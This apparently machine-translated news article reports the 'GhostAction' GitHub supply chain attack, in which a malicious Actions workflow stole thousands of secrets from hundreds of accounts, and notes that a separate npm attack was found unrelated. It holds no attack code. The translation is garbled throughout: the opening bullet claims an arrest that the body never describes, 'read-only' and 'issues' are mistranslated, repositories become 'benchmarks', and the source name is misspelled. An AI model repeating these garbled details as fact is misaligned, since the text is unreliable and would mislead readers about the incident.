- Ghostaction Attack stolen 3,325 secrets of 327 GitHub accounts
- Gitguardian helped arrest him and alerted affected projects
- A separate NPM attack struck 2,000 accounts but was not linked
Thousands of secrets such as Pypi and AWS Keys, Github Tokens, and more, were stolen recently during a supply chain attack against Github, nicknamed “Ghostaction”. The attack was spotted by Gitguardian security researchers, who informed Github and made him close.
Gitguardian researchers first spotted the attack when they were informed of a Github project called Fastuuid Compromis. The project responsible for the project was obviously penetrated and used to publish a workflow of malicious actions called “Add Github Actions Security Workflow”.
It was designed to steal secrets, including those of Pypi, NPM, Dockerhub, Github, Cloudflare and AWS.
The servers have closed
The researchers reported their results to Pypi and the project was transferred to a reading state alone. Shortly after, the owner of the legitimate account resumed access and withdrew the malicious commit.
However, as the attacker did not react in the next two days, Gitguardian researchers concluded that they were most likely too busy compromising other projects, and they were right. A more in -depth investigation discovered 327 compromised accounts, causing 3,325 disclosed secrets.
“After our impact assessment, we started to alert users and projects affected by creating problems in each compromised repository,” said Gitguardian in the report. “Among 817 benchmarks affected, 100 had already raised the malicious changes. We managed to create problems for 573 of the remaining 717 projects – the others were deleted or had disabled problems. ”
Shortly after the discovery of Ghostaction, the server to which the secrets were exfiltrated stopped resolving, which means that the campaign was successfully disrupted.
Gitguardian was also alerted from S1ngularity, an NPM supply chain attack which compromised more than 2,000 Github accounts and led to the leak of thousands of tokens and standards. Given that the two attacks occurred almost at the same time, they hypothesized that it could have been part of the same campaign. However, the investigation determined that these were two separate incidents:
“From this initial investigation, we have found no intersection between these users and the recent victim of the S1ngularity attack campaign. These two incidents are probably unrelated,” they concluded.
Via Bleeping Compompute
